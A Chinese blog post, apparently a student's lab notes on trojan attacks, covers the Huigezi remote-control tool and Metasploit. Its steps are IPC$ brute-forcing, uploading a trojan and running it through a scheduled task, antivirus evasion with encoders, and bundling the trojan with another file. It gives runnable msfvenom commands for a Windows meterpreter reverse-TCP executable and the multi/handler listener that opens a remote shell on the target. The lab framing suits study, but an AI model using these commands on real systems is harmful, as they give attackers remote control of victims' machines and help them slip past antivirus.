欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

木马攻击(灰鸽子和msf)

程序员文章站 2022-05-27 15:48:11
...

木马攻击

前言

最近在学习木马攻击方面,做了一个思维导图慢慢来学习。

不过凡是还是要从实例开始,对木马进行了大致的了解然后绘制了个脑图之后就要开始动手啦,下面记录一下我的学习过程

木马攻击(灰鸽子和msf)

ps:这里可能还需要补充

灰鸽子远程控制

攻击机:Windowsxp

靶机:windows server 2003

1.配置IP

木马攻击(灰鸽子和msf)

2.生成木马

木马攻击(灰鸽子和msf)

查看是否生成成功:

木马攻击(灰鸽子和msf)
木马攻击(灰鸽子和msf)

木马攻击(灰鸽子和msf)
利用ipc$暴力**

木马攻击(灰鸽子和msf)
上传木马并且计划任务运行

木马攻击(灰鸽子和msf)

木马攻击(灰鸽子和msf)
默默等待主机上线

木马攻击(灰鸽子和msf)

然后就可以任意操纵啦,实验完成之后还能帮server 2003关机~~~
木马攻击(灰鸽子和msf)

msf生成木马连接我的Windows主机

攻击机:kali
靶机:win10

利用msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.129 LPORT=4444 -f exe >wangzhe.exe

木马攻击(灰鸽子和msf)
会在当前路径生成一个wangzhe.exe 然后将其拖到windows下发现会被查杀

这里可以用编码器试一下能否实现免杀,定制编码器针对不同的杀软会有不同的效果;
木马攻击(灰鸽子和msf)
这里先不考虑如何绕过安全狗,所以先关掉电脑管家

木马攻击(灰鸽子和msf)

使用exploit模块

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST 192.168.11.129

set LPORT 4444

exploit

木马攻击(灰鸽子和msf)

执行命令

可以进入shell的环境执行命令,乱码是中文只需要调整终端的编码。

木马攻击(灰鸽子和msf)

简单捆绑实现

木马攻击(灰鸽子和msf)

木马攻击(灰鸽子和msf)

木马攻击(灰鸽子和msf)

完毕!

相关标签: 木马攻击